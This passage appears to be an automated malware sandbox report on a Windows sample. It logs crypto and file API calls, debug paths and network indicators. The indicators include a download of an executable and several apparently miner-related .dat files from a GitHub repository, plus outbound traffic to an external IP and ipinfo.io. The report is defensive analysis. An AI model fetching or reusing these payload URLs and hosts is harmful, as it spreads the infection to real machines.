Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA559E4F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,53_2_00007FFDA559E4F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55CE7A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,53_2_00007FFDA55CE7A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55B31A0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,53_2_00007FFDA55B31A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA5581180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,53_2_00007FFDA5581180
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55B3090 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,53_2_00007FFDA55B3090
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55B3110 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,53_2_00007FFDA55B3110
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA559E580 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,59_2_00007FFDA559E580
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA559E570 CryptHashData,59_2_00007FFDA559E570
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55AC4D0 memset,BCryptGenRandom,59_2_00007FFDA55AC4D0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55CB4E0 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,59_2_00007FFDA55CB4E0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA559E4F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,59_2_00007FFDA559E4F0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55CE7A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,59_2_00007FFDA55CE7A0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55B31A0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,59_2_00007FFDA55B31A0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA5581180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,59_2_00007FFDA5581180
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55B3090 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,59_2_00007FFDA55B3090
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55B3110 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,59_2_00007FFDA55B3110
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA559E3C0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,59_2_00007FFDA559E3C0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55CE270 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,59_2_00007FFDA55CE270
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55AC300 BCryptGenRandom,59_2_00007FFDA55AC300
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55CDE50 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext,59_2_00007FFDA55CDE50
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55CBA86 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,59_2_00007FFDA55CBA86
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_dead43ff-b
Source: C:\Windows\System32\console_zero.exeCode function: mov dword ptr [rbp+04h], 424D53FFh59_2_00007FFDA55B4930
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63778 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:63784 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63790 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63793 version: TLS 1.2
Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:63796 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63799 version: TLS 1.2
Source: Ld0f3NDosJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: vcruntime140d.amd64.pdb,,, source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363092235.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000003B.00000002.2612916762.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362305807.00007FFD93B8B000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363092235.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000003B.00000002.2612916762.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: ucrtbased.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: PrintUI.pdb source: usvcinsta64.exe, 00000018.00000003.2501497770.0000025D7065E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 00000028.00000000.2502474138.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: PrintUI.pdbGCTL source: usvcinsta64.exe, 00000018.00000003.2501497770.0000025D7065E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 00000028.00000000.2502474138.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E58E3C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,3_2_00007FF646E58E3C
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E58CF8 FindClose,FindFirstFileExW,GetLastError,3_2_00007FF646E58CF8
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E6D270 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF646E6D270
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C70144 FindClose,FindFirstFileExW,GetLastError,59_2_00007FF6F8C70144
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C701B8 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,59_2_00007FF6F8C701B8
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C83764 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,59_2_00007FF6F8C83764
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D356D568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,84_2_00007FF6D356D568
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA96D568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,87_2_00007FF6EA96D568
Source: global trafficTCP traffic: 192.168.2.6:63787 -> 38.180.213.183:5432
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: ipinfo.io
Source: global trafficHTTP traffic detected: GET /panchitopistolesx/items/main/hardsvcupdt.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E566B0 GetCurrentDirectoryW,URLDownloadToFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF646E566B0
Source: global trafficHTTP traffic detected: GET /panchitopistolesx/items/main/hardsvcupdt.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: tse1.mm.bing.net
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: global trafficDNS traffic detected: DNS query: runvrs.com
Source: global trafficDNS traffic detected: DNS query: github.com
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpString found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2612733960.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmp, console_zero.exe, 0000003B.00000002.2612200244.000001D64B0CC000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000003B.00000000.2583942814.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTC
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, console_zero.exe, 0000003B.00000002.2612733960.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmp, console_zero.exe, 0000003B.00000000.2583942814.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;
Source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3360185514.00000000682A4000.00000008.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.gnu.org/licenses/
Source: svchost.exeString found in binary or memory: http://www.zlib.net/
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363113098.00007FFDA5547000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000003B.00000002.2612942389.00007FFDA5547000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.zlib.net/D
Source: svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000003B.00000002.2613577176.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/V
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: console_zero.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/docs/copyright.html
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000003B.00000002.2613577176.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: console_zero.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: svchost.exe, 00000035.00000002.3361917101.000001BB8BD29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/panchitopistolesx/items/raw/main/my_backup_a
Source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://ipinfo.io/json
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356433154.000001E8BF3C6000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334869302.000001E8BF3C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF3B4000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF3B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/1F7
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/bG
Source: svchost.exe, 00000035.00000003.2846038368.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2914585077.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3178715641.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3113596577.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3361335703.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3048858018.000001BB8BAF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/_cpu.dat
Source: svchost.exe, 00000035.00000003.2846038368.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2914585077.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3178715641.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3113596577.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3361335703.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3048858018.000001BB8BAF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/_cpuwsys.dat
Source: svchost.exe, 00000035.00000002.3360728429.000001BB8BA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/amdg.dat
Source: Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000002.2356237105.000001E8BF34C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356655360.000001E8C10D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe.net1&0
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356655360.000001E8C10D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe06
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356468392.000001E8BF422000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334778364.000001E8BF422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeC:
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356433154.000001E8BF3D7000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334869302.000001E8BF3D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeLMEM
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeNH
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeQg
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356237105.000001E8BF34C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeU
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356655360.000001E8C10D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exent.com1
